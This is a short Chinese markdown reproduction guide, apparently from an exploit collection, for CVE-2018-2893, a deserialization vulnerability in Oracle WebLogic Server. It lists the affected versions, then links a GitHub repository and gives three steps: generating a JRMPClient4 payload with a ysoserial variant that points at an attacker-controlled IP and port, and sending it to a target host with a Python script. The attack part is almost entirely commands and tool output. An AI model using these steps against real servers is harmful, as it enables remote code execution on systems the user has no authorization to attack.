007-CVE-2018-2893 WebLogic WLS核心组件反序列化漏洞.md

824 B / 2021-07-17 00:01:30
    # CVE-2018-2893 WebLogic WLS核心组件反序列化漏洞

### 一、漏洞简介

### 二、漏洞影响

Oracle WebLogic Server 10.3.6.0

Oracle WebLogic Server 12.1.3.0

Oracle WebLogic Server 12.2.1.2

Oracle WebLogic Server 12.2.1.3

### 三、复现过程

https://github.com/ianxtianxt/CVE-2018-2893

Step 1


```
java -jar ysoserial-cve-2018-2893.jar
```


```bash
WHY SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
     Payload     Authors   Dependencies
     -------     -------   ------------
     JRMPClient  @mbechler
     JRMPClient2 
     JRMPClient3 
     JRMPClient4 
     Jdk7u21     @frohoff
```

Step 2


```
java -jar ysoserial-cve-2018-2893.jar JRMPClient4 "<ip>:<port>" > poc4.ser
```

Step 3


```
python weblogic.py <host> <port> poc4.ser
```